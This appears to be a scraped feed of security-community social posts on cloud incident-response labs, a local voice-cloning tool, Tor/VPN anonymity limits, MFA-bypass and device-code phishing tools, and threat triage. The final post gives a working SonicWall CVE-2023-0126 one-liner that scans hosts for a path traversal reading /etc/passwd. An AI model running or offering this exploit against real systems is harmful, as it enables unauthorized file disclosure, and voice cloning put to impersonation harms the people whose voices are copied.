David Routin

🚀 Introducing 𝐀𝐥𝐥-𝐈𝐧 access for Cloud Labs Most cloud security training happens in a vacuum. Real-world attacks don't. We are incredibly excited to announce the launch of our All-in level for Cloud Labs. Here is what makes this scenario unique: 🌐 Cross-Cloud Attacks: You will trace sophisticated threats that pivot across different cloud environments, mimicking the true complexity of modern, multi-layered breaches. 🛠️ Live Environment Access: You get real, hands-on access to investigate active threat scenarios directly within live Google Workspace and Google Cloud environments. It is time to test your cloud incident response skills for real! #stayInvictus #CloudIncidentResponse #CloudLabs

🚨BREAKING: The "Ollama for voice cloning" just dropped. It's called Voicebox and it clones any voice from just a few seconds of audio entirely on your machine. No ElevenLabs subscription. No cloud uploads. No voice data leaving your device. It's powered by Qwen3-TTS, Alibaba's breakthrough voice model. → Upload a few seconds of audio → Get a near-perfect voice clone → Generate speech in any language → Mix multi-voice conversations in a DAW-like timeline editor All running locally. Zero cloud dependency. But it's not just a TTS wrapper. It's a full voice production studio: → Multi-track timeline editor for podcasts and dialogues → System audio capture + Whisper transcription built in → Voice prompt caching for instant regeneration → Built with Tauri (Rust), not Electron 10x smaller, native performance 100% Opensource. MIT Licensed. macOS + Windows available now. Linux coming soon. This is the moment voice cloning leaves the cloud and runs on your desktop. Link in the first comment.

As part of the ongoing VPN/Tor alone can't save you theme. There are many ways to burn your identity from sophisticated endpoint leaks to simple blunders that you hadn't considered.

Graph-based OSINT investigation platform

Wi-Fi as a Motion Sensor

@CraigHRowland Posting a meme and a "generic" answer cannot be a technical answer in any way. COuld you porovide practical example of what you are talking about precisely and how it can lead to IP identification at the end ?

Stopping IP and metadata leaks on a device with Tor browser alone is the proverbial bandaid on a shotgun wound. The entire device is doing nothing but spewing data that can identify you if anything goes wrong.

@CraigHRowland Afaik all exposures were resolved with all tor browser usage... Webrtc, dns leak, JS, external plugins... It was exactly the meaning of my question. Which technical prof remain that it can happen on fully patched tor browser ?

@Rewt_1 Covered in other threads. Tor/VPN leaks happen through browser/endpoint antics. The remote server and device apps can and will leak data regardless of what crypto is protecting the communications.

In my professional opinion, using a VPN on a public wifi makes you less secure and less anonymous.

@CraigHRowland Would you mind providing real technical arguments instead of generic non-sense ?

I'm on my quarterly: "Tor/VPN ain't gonna save you..." posting spree.

@CloudR907 @CraigHRowland It would means they have a Root CA key of a CA trusted in your browser... Not that easy for non gov lea...

@CraigHRowland That initial hop from your computer to your ISP to the vpn router. Thats all they need. After that it’s all logs and time stamps. He’ll, a Palo Alto firewall at the isp could decrypt your traffic without you even knowing it. You’re not safe.

I just updated my Intune tool IntuneDeviceDetailsGUI to version 2.98 which now uses Microsoft Graph -module. Update your old version to this newest version. New requested features are Show Bitlocker Recovery Keys and LAPS Password. #MMSMOA #Intune github.com/petripaavola/I…

Anyone want a cloud attack VM like Kali? We can call it Cloudy. Yes, I made one 😊 - AiTM phishing MFA Bypass - Illicet consent phishing MFA Bypass - CAP gap analysis for MFA avoidant activities - Device code phishing MFA bypass - Token abuse tools for MFA bypass - Teams phishing - Post-exploitation tools - Enumeration tools - Spray tools

👀Well that is interesting...i've never heard of this before huntress.com/blog/slashandg…

4/ After contacting MTG sellers were where things became interesting. -buyer was spending millions on starter decks, alpha sets, sealed boxes -buyer seemed to be overpaying by 5-10% -buyer sent crypto up front and broker met up IRL with seller -buyer was unknown to seller -said the broker has limited crypto knowledge (likely does not know about Tornado) *seller names will be kept private for their safety*

💜Adversary Simulation and Purple friends💜 I'm happy to share this simulation plan which regroups a TOP 35 @MITREattack TTPs from 22-23. Based on open source intel, it's meant to ease the onboarding of more into Purple! Have a look at the readme #CTI #TTP github.com/Sam0x90/CTI/tr…

How do you recover from a **forest compromise** in a hybrid environment with Microsoft Cloud? Assume all components of Microsoft Cloud and On-premises Active Directory are in use. We all know the right answer is nuke it from space, so wrong answers only. PLZ Repost!

CitrixBleed. Yep, that's it, the whole exploit. github.com/assetnote/expl…

We strongly advise everyone that has (had) a Cisco IOS XE WebUI exposed to the internet to perform a forensic triage. We published steps on identifying compromised systems on our GitHub here: github.com/fox-it/cisco-i… [3/3]

Why not sell API keys used in #phishing kits rather than spending so much energy on the community for free? 👋 (just kidding) #phishingkit #fraud #whatsapp

New blog: Phishing for Primary Refresh Tokens and Windows Hello keys. This blog describes how we can use device code phishing to obtain PRTs and in some cases even add backdoor Windows Hello keys 🤯 dirkjanm.io/phishing-for-m…

CVE-2023-0126 SonicWall SMA1000 File Read Bug POC: cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";done